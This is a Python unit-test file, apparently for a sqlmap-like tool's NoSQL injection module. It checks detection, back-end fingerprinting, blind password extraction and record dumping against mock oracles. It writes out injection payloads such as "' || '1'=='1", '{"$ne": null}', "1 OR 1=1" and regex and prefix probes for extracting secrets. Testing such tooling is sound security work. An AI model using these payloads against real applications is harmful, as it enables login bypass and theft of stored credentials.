    """Mock AQL string-context oracle: a "=~ '^...'" clause is searched (unanchored) in SECRET;
    without such a clause only the '1'=='1 tautology matches"""

    found = re.search(r"=~ '(\^[^']*)'", value)  # the regex body inside =~ '...'

    if not found:
        return MATCH if "'1'=='1" in value else NOMATCH

    try:  # ArangoDB =~ is a partial (unanchored) match
        hit = re.search(found.group(1), SECRET)
    except re.error:
        return NOMATCH

    return MATCH if hit is not None else NOMATCH
class TestNoSqlArango(unittest.TestCase):
    """AQL string break-out detection and blind extraction against the _aql() oracle"""

    def setUp(self):
        self._savedFetchValue = ni._fetchValue
        ni._fetchValue = _aql

    def tearDown(self):
        ni._fetchValue = self._savedFetchValue

    def test_detect(self):
        detected = ni._detectAQL("GET", "password")
        self.assertTrue(detected)

    def test_extract(self):
        def fetchFn(v):
            return ni._fetchValue("GET", "password", v)

        def lengthValue(n):
            return "%s' || (u.password =~ '^.{%d,}') || '1'=='2" % (ni.NOSQL_SENTINEL, n)

        def charValue(known, klass):
            return "%s' || (u.password =~ '^%s%s') || '1'=='2" % (ni.NOSQL_SENTINEL, ni._javaEscape(known), klass)

        # the always-true break-out response serves as the comparison template
        template = ni._fetchValue("GET", "password", ni.NOSQL_SENTINEL + "' || '1'=='1")
        value = ni._extract(template, fetchFn, lengthValue, charValue)

        self.assertEqual(value, SECRET)
def _n1ql(place, parameter, value):
    """Mock N1QL string-context oracle: a REGEXP_CONTAINS(<expr>, '<re>') clause is searched in
    SECRET, any use of '=~' is answered with an engine error, and otherwise only the '1'='1
    tautology matches"""

    found = re.search(r"REGEXP_CONTAINS\([^,]+, '([^']*)'\)", value)

    if found:
        # model the single-quoted string layer (collapse the doubled backslashes)
        pattern = found.group(1).replace("\\\\", "\\")
        try:
            hit = re.search(pattern, SECRET)
        except re.error:
            return NOMATCH
        return MATCH if hit is not None else NOMATCH

    if "=~" in value:  # N1QL has no =~ operator -> engine error
        return "error: syntax error near '=~'"

    return MATCH if "'1'='1" in value else NOMATCH
class TestNoSqlN1QL(unittest.TestCase):
    """Couchbase N1QL answers the same ' OR '1'='1 break-out as Neo4j, so _resolve() has to tell the
    two apart by the regexp primitive ('=~' fails, REGEXP_CONTAINS works) and still extract"""

    def setUp(self):
        self._savedFetch = ni._fetch
        self._savedFetchValue = ni._fetchValue

        ni._fetch = lambda *args, **kwargs: ""  # keep MongoDB operator detection out of the way
        ni._fetchValue = _n1ql
        ni.conf.parameters = {"GET": "name=luther&password=x"}

    def tearDown(self):
        ni._fetch = self._savedFetch
        ni._fetchValue = self._savedFetchValue

    def test_resolve_disambiguates_couchbase(self):
        vector = ni._resolve("GET", "password", "password")

        self.assertEqual(vector.dbms, "Couchbase")
        self.assertEqual(vector.bypass, "' OR '1'='1")

    def test_extract(self):
        vector = ni._resolve("GET", "password", "password")
        value = ni._extract(vector.template, vector.fetch, vector.lengthValue, vector.charValue, vector.truth)

        self.assertEqual(value, SECRET)
def _whereTruth(payload):
    """Emulates the $where timing oracle: a payload "delays" (-> True) iff the JS condition embedded
    in it holds for SECRET - either a 'length>=N' check or a '/^.../.test' prefix match"""

    lengthCheck = re.search(r"length>=(\d+)", payload)
    if lengthCheck:
        minimum = int(lengthCheck.group(1))
        return len(SECRET) >= minimum

    regexCheck = re.search(r"/\^([^/]*)/\.test", payload)
    if regexCheck:
        return re.search("^" + regexCheck.group(1), SECRET) is not None

    return False
class TestNoSqlWhere(unittest.TestCase):
    """MongoDB $where time-based: checks the server-side-JS payload shapes together with the
    extraction loop, the timing predicate being emulated deterministically by _whereTruth()"""

    def setUp(self):
        ni.conf.timeSec = 5

    def test_extract(self):
        key = "password"

        def lengthValue(n):
            return ni._whereDelay("d.%s&&d.%s.length>=%d" % (key, key, n))

        def charValue(known, klass):
            return ni._whereDelay("d.%s&&/^%s%s/.test(d.%s)" % (key, ni._javaEscape(known), klass, key))

        # no template/fetcher: the truth predicate alone drives the extraction
        value = ni._extract(None, None, lengthValue, charValue, _whereTruth)

        self.assertEqual(value, SECRET)
def _jswhere(place, parameter, value):
    """Emulates a content-bearing MongoDB $where (server-side JavaScript) endpoint: non-JS syntax
    gives a constant error page, regexp/length conditions are evaluated against SECRET, and the
    '1'=='1 tautology or a bare 'this.password)' condition matches"""

    if " OR " in value or " =~ " in value:  # not valid JS -> consistent (non-diverging) error
        return "<error>"

    probe = re.search(r"/(.)/\.test\('x'\)", value)  # JS regexp-test disambiguation probe
    if probe:
        return MATCH if re.search(probe.group(1), "x") is not None else NOMATCH

    extraction = re.search(r"/\^([^/]*)/\.test\(this\.password\)", value)  # value extraction
    if extraction:
        try:
            hit = re.search("^" + extraction.group(1), SECRET)
        except re.error:
            return NOMATCH
        return MATCH if hit is not None else NOMATCH

    lengthCheck = re.search(r"length>=(\d+)", value)  # length search
    if lengthCheck:
        return MATCH if len(SECRET) >= int(lengthCheck.group(1)) else NOMATCH

    # boolean detection / bound always-true template
    if "'1'=='1" in value or "this.password)" in value:
        return MATCH

    return NOMATCH
class TestNoSqlWhereContent(unittest.TestCase):
    """A content-bearing MongoDB $where answers the same ' || '1'=='1 break-out as ArangoDB, so
    _resolve() has to tell them apart (AQL '=~' fails, a JS /re/.test() holds) and then extract
    through the content oracle"""

    def setUp(self):
        self._savedFetch = ni._fetch
        self._savedFetchValue = ni._fetchValue

        ni._fetch = lambda *args, **kwargs: ""
        ni._fetchValue = _jswhere
        ni.conf.parameters = {"GET": "username=luther&password=x"}

    def tearDown(self):
        ni._fetch = self._savedFetch
        ni._fetchValue = self._savedFetchValue

    def test_resolve_where_content(self):
        vector = ni._resolve("GET", "password", "password")

        self.assertEqual(vector.dbms, "MongoDB ($where)")
        self.assertEqual(vector.bypass, "' || '1'=='1")

    def test_extract(self):
        vector = ni._resolve("GET", "password", "password")
        value = ni._extract(vector.template, vector.fetch, vector.lengthValue, vector.charValue, vector.truth)

        self.assertEqual(value, SECRET)
class TestNoSqlWhereDump(unittest.TestCase):
    """$where whole-document dump: the Object.keys() enumeration drives name + value recovery for
    every field (the per-field character recovery itself is covered by TestNoSqlWhere)"""

    DOC = [("id", "1"), ("username", "luther"), ("password", "s3cr3t"), ("role", "admin")]

    def setUp(self):
        self._savedWhereField = ni._whereField

        fieldNames = [name for name, _ in self.DOC]
        fieldValues = dict(self.DOC)

        def fake(place, parameter, bound, expr, threshold):
            # i-th field name
            byIndex = re.search(r"Object\.keys\(d\)\[(\d+)\]", expr)
            if byIndex:
                index = int(byIndex.group(1))
                if index < len(fieldNames):
                    return fieldNames[index]
                return None

            # value of a named field
            byName = re.search(r"d\['([^']*)'\]", expr)
            if byName:
                return fieldValues.get(byName.group(1))

            return None

        ni._whereField = fake

    def tearDown(self):
        ni._whereField = self._savedWhereField

    def test_dump(self):
        columns, rows = ni._whereDump("GET", "password", "", 0)

        self.assertEqual(columns, ["id", "username", "password", "role"])
        self.assertEqual(rows, [["1", "luther", "s3cr3t", "admin"]])

    def test_empty_document(self):
        # no field name recovered at all -> no dump
        ni._whereField = lambda *args, **kwargs: None
        self.assertIsNone(ni._whereDump("GET", "password", "", 0))
class TestNoSqlEnumDump(unittest.TestCase):
    """Content-based whole-document dump (e.g. Neo4j keys(u)): field names are enumerated first,
    then the value of each one"""

    DOC = [("id", "1"), ("username", "luther"), ("password", "s3cr3t"), ("role", "admin")]

    def setUp(self):
        self._savedEnumField = ni._enumField
        self._savedFetchValue = ni._fetchValue

        ni._fetchValue = lambda *args, **kwargs: "<b>Welcome</b>"  # non-error single-record template

        fieldNames = [name for name, _ in self.DOC]
        fieldValues = dict(self.DOC)

        def fake(place, parameter, template, payloadFor):
            probe = payloadFor("X")  # render to inspect the target expression

            byIndex = re.search(r"\(u\)\[(\d+)\]", probe)  # keys/ATTRIBUTES/OBJECT_NAMES(u)[i]
            if byIndex:
                index = int(byIndex.group(1))
                if index < len(fieldNames):
                    return fieldNames[index]
                return None

            byName = re.search(r"u\['([^']*)'\]", probe)  # toString/TO_STRING/TOSTRING(u['name'])
            if byName:
                return fieldValues.get(byName.group(1))

            return None

        ni._enumField = fake

    def tearDown(self):
        ni._enumField = self._savedEnumField
        ni._fetchValue = self._savedFetchValue

    def _check(self, keysExpr, valueExpr):
        def makePayload(expr, rb):
            return "X' OR %s =~ '^%s.*" % (expr, rb)

        columns, rows = ni._enumDump("GET", "password", makePayload, keysExpr, valueExpr)

        self.assertEqual(columns, ["id", "username", "password", "role"])
        self.assertEqual(rows, [["1", "luther", "s3cr3t", "admin"]])

    def test_cypher(self):
        self._check(lambda i: "keys(u)[%d]" % i,
                    lambda n: "toString(u[%s])" % ni._propLiteral(n))

    def test_aql(self):
        self._check(lambda i: "ATTRIBUTES(u)[%d]" % i,
                    lambda n: "TO_STRING(u[%s])" % ni._propLiteral(n))

    def test_n1ql(self):
        self._check(lambda i: "OBJECT_NAMES(u)[%d]" % i,
                    lambda n: "TOSTRING(u[%s])" % ni._propLiteral(n))
class TestNoSqlBypass(unittest.TestCase):
    """A confirmed injection has to surface the always-true (authentication/filter bypass) payload"""

    def setUp(self):
        self._savedFetch = ni._fetch
        ni._fetch = _mongo

    def tearDown(self):
        ni._fetch = self._savedFetch

    def test_mongo_bypass(self):
        vector = ni._resolve("GET", "password", "password")

        self.assertEqual(vector.dbms, "MongoDB")
        self.assertEqual(vector.bypass, '{"$ne": null}')
class TestNoSqlInband(unittest.TestCase):
    """In-band exposure gate: _inband() hands back the always-true response only when it carries
    materially more reflected content than the response to the original request"""

    def setUp(self):
        self._savedFetchValue = ni._fetchValue
        ni.conf.parameters = {"GET": "id=1"}

    def tearDown(self):
        ni._fetchValue = self._savedFetchValue

    def test_exposure_detected(self):
        # original (one row)
        ni._fetchValue = lambda place, parameter, value: "<table><tr><td>1</td><td>luther</td></tr></table>"
        # always-true (three rows)
        template = "<table><tr><td>1</td><td>luther</td></tr><tr><td>2</td><td>fluffy</td></tr><tr><td>3</td><td>wu</td></tr></table>"

        self.assertEqual(ni._inband("GET", "id", template), template)

    def test_no_exposure_when_not_larger(self):
        # original (large)
        ni._fetchValue = lambda place, parameter, value: "X" * 200

        # always-true smaller -> no dump
        self.assertIsNone(ni._inband("GET", "id", "<b>Welcome</b>"))
class TestNoSqlRecords(unittest.TestCase):
    """Reflected responses get parsed into (columns, rows) for a regular table dump"""

    def test_html_table_without_header(self):
        page = ("<html><body><b>Results:</b><table border=\"1\">"
                "<tr><td>1</td><td>luther</td><td>blisset</td></tr>"
                "<tr><td>2</td><td>fluffy</td><td>bunny</td></tr></table></body></html>")

        columns, rows = ni._records(page)

        # no <th> row -> generated column names
        self.assertEqual(columns, ["column_1", "column_2", "column_3"])
        self.assertEqual(rows, [["1", "luther", "blisset"], ["2", "fluffy", "bunny"]])

    def test_html_table_with_header(self):
        page = "<table><tr><th>id</th><th>user</th></tr><tr><td>1</td><td>luther</td></tr></table>"

        columns, rows = ni._records(page)

        self.assertEqual(columns, ["id", "user"])
        self.assertEqual(rows, [["1", "luther"]])

    def test_json_array_of_objects(self):
        page = '{"results": [{"id": 1, "username": "luther", "password": null}, {"id": 2, "username": "fluffy"}]}'

        columns, rows = ni._records(page)

        # null -> "NULL", a field missing from a record -> ""
        self.assertEqual(columns, ["id", "username", "password"])
        self.assertEqual(rows, [["1", "luther", "NULL"], ["2", "fluffy", ""]])

    def test_unstructured_returns_none(self):
        parsed = ni._records("<html><body>just some prose, no records here</body></html>")
        self.assertIsNone(parsed)
def _numeric(place, parameter, value):
    """Numeric-context oracle: 'OR 1=1' is always-true (rows), 'AND 1=2' is false (no rows), and
    any other value matches only when it is exactly "1\""""

    for marker, page in (("OR 1=1", MATCH), ("AND 1=2", NOMATCH)):
        if marker in value:
            return page

    if value == "1":
        return MATCH

    return NOMATCH
class TestNoSqlNumeric(unittest.TestCase):
    """Numeric-context (unquoted) break-out, e.g. 'WHERE id = <input>': detected through OR/AND,
    with the always-true response carried as the in-band dump template"""

    def setUp(self):
        self._savedFetch = ni._fetch
        self._savedFetchValue = ni._fetchValue

        ni._fetch = lambda *args, **kwargs: ""
        ni._fetchValue = _numeric
        ni.conf.parameters = {"GET": "id=1"}
        ni.conf.paramDict = {"GET": {"id": "1"}}

    def tearDown(self):
        ni._fetch = self._savedFetch
        ni._fetchValue = self._savedFetchValue

    def test_resolve_numeric(self):
        vector = ni._resolve("GET", "id", "id")

        self.assertEqual(vector.dbms, "Neo4j")
        self.assertEqual(vector.bypass, "1 OR 1=1")
        # numeric field -> in-band only, no blind extraction
        self.assertIsNone(vector.lengthValue)

    def test_skips_non_numeric(self):
        ni.conf.parameters = {"GET": "name=luther"}

        # only applies to a numeric field value
        self.assertIsNone(ni._detectNumeric("GET", "name"))
def _numericN1ql(place, parameter, value):
    # stand-in oracle for a numeric Couchbase context: besides the OR/AND boolean pair it
    # answers the N1QL-only REGEXP_CONTAINS discriminator by running the quoted pattern
    # against the literal 'ab'
    probe = re.search(r"REGEXP_CONTAINS\('ab', '([^']*)'\)", value)
    if probe is not None:
        pattern = probe.group(1)
        return NOMATCH if re.search(pattern, "ab") is None else MATCH
    for marker, verdict in (("OR 1=1", MATCH), ("AND 1=2", NOMATCH)):
        if marker in value:
            return verdict
    # nothing injected: only the untouched original value "1" matches
    if value == "1":
        return MATCH
    return NOMATCH
class TestNoSqlNumericN1QL(unittest.TestCase):
    """Numeric Couchbase injection point: the N1QL-only REGEXP_CONTAINS probe is what tells it
    apart from Neo4j"""

    def setUp(self):
        # keep the real hooks so tearDown can put them back
        self._f = ni._fetch
        self._fv = ni._fetchValue
        ni._fetch = lambda *args, **kwargs: ""
        ni._fetchValue = _numericN1ql
        ni.conf.parameters = {"GET": "id=1"}

    def tearDown(self):
        ni._fetch = self._f
        ni._fetchValue = self._fv

    def test_resolve_numeric_couchbase(self):
        # the middle element of the result is not checked by this test
        backend, _, payload = ni._detectNumeric("GET", "id")
        self.assertEqual(backend, "Couchbase")
        self.assertEqual(payload, "1 OR 1=1")
def _numericAql(place, parameter, value):
    # stand-in oracle for a numeric ArangoDB context: the ||/&& family is the only one that
    # diverges, so nothing but a '|| 1==1' payload matches (OR/AND and REGEXP_CONTAINS do not)
    if "|| 1==1" in value:
        return MATCH
    return NOMATCH
class TestNoSqlNumericAQL(unittest.TestCase):
    """Numeric ArangoDB injection point: with OR/AND yielding no divergence, detection falls to
    the ||/&& operator family"""

    def setUp(self):
        # keep the real hooks so tearDown can put them back
        self._f = ni._fetch
        self._fv = ni._fetchValue
        ni._fetch = lambda *args, **kwargs: ""
        ni._fetchValue = _numericAql
        ni.conf.parameters = {"GET": "id=1"}

    def tearDown(self):
        ni._fetch = self._f
        ni._fetchValue = self._fv

    def test_resolve_numeric_arango(self):
        # the middle element of the result is not checked by this test
        backend, _, payload = ni._detectNumeric("GET", "id")
        self.assertEqual(backend, "ArangoDB")
        self.assertEqual(payload, "1 || 1==1")
def _partiql(place, parameter, value):
    # stand-in oracle for a DynamoDB PartiQL string context, answering two payload shapes:
    #  - "field >= 'prefix": matches iff SECRET >= prefix (ordered comparison, the basis of
    #    the comparison-bisection extraction); doubled quotes in the prefix are un-escaped
    #  - "begins_with(field, 'prefix') OR '1'='2": matches iff SECRET starts with prefix
    # anything else never matches
    ordered = re.search(r">= '(.*)$", value)
    if ordered is not None:
        prefix = ordered.group(1).replace("''", "'")
        return MATCH if SECRET >= prefix else NOMATCH
    leading = re.search(r"begins_with\([^,]+, '(.*?)'\) OR '1'='2", value)
    if leading is not None:
        if SECRET.startswith(leading.group(1)):
            return MATCH
        return NOMATCH
    return NOMATCH
class TestNoSqlPartiQL(unittest.TestCase):
    """DynamoDB PartiQL has no regexp engine, so a value is recovered through ordered string
    comparison (field >= 'prefix'), bisected over the printable-ASCII range"""

    def setUp(self):
        # keep the real hook so tearDown can put it back
        self._fv = ni._fetchValue
        ni._fetchValue = _partiql
        ni.conf.parameters = {"GET": "username=luther&password=x"}
        ni.conf.paramDict = {"GET": {"password": "x"}}

    def tearDown(self):
        ni._fetchValue = self._fv

    def test_extract(self):
        recovered = ni._partiqlValue("GET", "password", "", "password")
        self.assertEqual(recovered, SECRET)

    def test_dump_binds_sibling(self):
        names, records = ni._partiqlDump("GET", "password", "password")
        self.assertEqual(names, ["password"])
        self.assertEqual(records, [[SECRET]])

    def test_dump_without_sibling_returns_none(self):
        # no sibling to pin a single record
        ni.conf.parameters = {"GET": "password=x"}
        ni.conf.paramDict = {"GET": {"password": "x"}}
        outcome = ni._partiqlDump("GET", "password", "password")
        self.assertIsNone(outcome)
def _numericDdb(place, parameter, value):
    # stand-in oracle for a numeric DynamoDB context: besides the OR/AND boolean pair it
    # answers the PartiQL-only begins_with discriminator by testing the quoted prefix
    # against the literal 'ab'
    probe = re.search(r"begins_with\('ab', '([^']*)'\)", value)
    if probe is not None:
        prefix = probe.group(1)
        if "ab".startswith(prefix):
            return MATCH
        return NOMATCH
    for marker, verdict in (("OR 1=1", MATCH), ("AND 1=2", NOMATCH)):
        if marker in value:
            return verdict
    # nothing injected: only the untouched original value "1" matches
    if value == "1":
        return MATCH
    return NOMATCH
class TestNoSqlNumericDynamoDB(unittest.TestCase):
    """Numeric DynamoDB injection point: the PartiQL-only begins_with probe is what tells it
    apart from Neo4j/Couchbase"""

    def setUp(self):
        # keep the real hooks so tearDown can put them back
        self._f = ni._fetch
        self._fv = ni._fetchValue
        ni._fetch = lambda *args, **kwargs: ""
        ni._fetchValue = _numericDdb
        ni.conf.parameters = {"GET": "id=1"}

    def tearDown(self):
        ni._fetch = self._f
        ni._fetchValue = self._fv

    def test_resolve_numeric_dynamodb(self):
        # the middle element of the result is not checked by this test
        backend, _, payload = ni._detectNumeric("GET", "id")
        self.assertEqual(backend, "DynamoDB")
        self.assertEqual(payload, "1 OR 1=1")
class TestNoSqlCookiePlace(unittest.TestCase):
    """Cookie place: parameters are split and joined on ';' (not '&') and the segment is routed
    to the Cookie header"""

    def setUp(self):
        ni.conf.cookieDel = None
        ni.conf.parameters = {ni.PLACE.COOKIE: "session=abc; username=luther; password=x"}
        ni.conf.paramDict = {ni.PLACE.COOKIE: {"password": "x"}}

    def test_delimiter(self):
        cookieDelimiter = ni._delim(ni.PLACE.COOKIE)
        self.assertEqual(cookieDelimiter, ";")
        getDelimiter = ni._delim(ni.PLACE.GET)
        self.assertEqual(getDelimiter, "&")

    def test_original_value(self):
        # surrounding whitespace from the '; ' separated cookie string is not significant here
        raw = ni._originalValue(ni.PLACE.COOKIE, "username")
        self.assertEqual(raw.strip(), "luther")

    def test_replace_segment(self):
        rebuilt = ni._replaceSegment(ni.PLACE.COOKIE, "password", "password[$ne]=zzz")
        # untouched siblings survive and the replacement segment is present
        for piece in ("session=abc", "username=luther", "password[$ne]=zzz"):
            self.assertIn(piece, rebuilt)
        # 3 segments -> 2 delimiters (no '&')
        self.assertEqual(rebuilt.count(";"), 2)
        self.assertNotIn("&", rebuilt)

    def test_constraint_binds_siblings(self):
        clause = ni._constraint(ni.PLACE.COOKIE, "password")
        for binding in ("u.session='abc'", "u.username='luther'"):
            self.assertIn(binding, clause)
class TestNoSqlErrorRegex(unittest.TestCase):
    """The heuristic regex has to hit genuine back-end error structures rather than bare product
    names, so that an article which merely mentions MongoDB/Elasticsearch/Cassandra is never
    flagged as injectable"""

    # imported in the class body, which makes the pattern reachable as self.NOSQL_ERROR_REGEX
    from lib.core.settings import NOSQL_ERROR_REGEX

    # error output samples that the regex is required to match
    POSITIVES = (
        'MongoServerError: unknown operator: $foo',
        '{"ok":0,"errmsg":"unknown top level operator: $where","code":2,"codeName":"BadValue"}',
        'MongoServerError: Regular expression is invalid: missing )',
        'CastError: Cast to ObjectId failed',
        '{"error":"query_parse_error","reason":"Invalid operator: $foo"}',
        '{"error":{"root_cause":[{"type":"query_shard_exception","reason":"Failed to parse query [luther\']"}]},"status":400}',
        '{"type":"x_content_parse_exception","reason":"[1:18] [bool] failed to parse"}',
        '{"error":{"msg":"org.apache.solr.search.SyntaxError: Cannot parse \'username:\'","code":400}}',
        "Neo.ClientError.Statement.SyntaxError: Invalid input",
        'Neo4j error: Failed to parse string literal. The query must contain an even number of non-escaped quotes. (line 1, column 30) "MATCH (u:User) WHERE u.id = 1"',
        "<b>Neo4j error:</b> Invalid input ''x'': expected an expression, 'FOREACH', 'MATCH', 'MERGE', 'UNWIND', 'WITH' or <EOF>",
        '{"error":true,"errorNum":1501,"errorMessage":"AQL: syntax error, unexpected quoted string"}',
        "ResponseError: line 1:38 no viable alternative at input",
        "SyntaxException: line 1:42 mismatched input ''' expecting EOF",
        '{"error":{"root_cause":[{"type":"number_format_exception","reason":"For input string"}]},"status":400}',
        'ReplyError: WRONGTYPE Operation against a key holding the wrong kind of value',
        'ReplyError: ERR Error compiling script (new function): user_script:1: unexpected symbol',
        'CLIENT_ERROR bad command line format',
        'error parsing query: found WHERE, expected identifier at line 1',
        'org.apache.phoenix.exception.PhoenixIOException: failed',
    )

    # benign pages (product names in prose, ordinary result/login markup) that must NOT match
    NEGATIVES = (
        "This article explains how MongoDB, CouchDB and Elasticsearch handle queries.",
        "Cassandra and Redis are popular NoSQL databases; Neo4j is a graph database.",
        "We migrated from Solr to OpenSearch last year. ArangoDB is multi-model.",
        "<html><body><b>Results:</b><table><tr><td>1</td><td>luther</td></tr></table></body></html>",
        "<html><body><b>Invalid credentials</b></body></html>",
    )

    def test_matches_real_errors(self):
        for sample in self.POSITIVES:
            hit = re.search(self.NOSQL_ERROR_REGEX, sample)
            self.assertIsNotNone(hit, "should match: %s" % sample)

    def test_ignores_benign_text(self):
        for sample in self.NEGATIVES:
            hit = re.search(self.NOSQL_ERROR_REGEX, sample)
            self.assertIsNone(hit, "should NOT match: %s" % sample)
# script entry point: hand control to the unittest runner when this file is executed directly
if __name__ == "__main__":
unittest.main()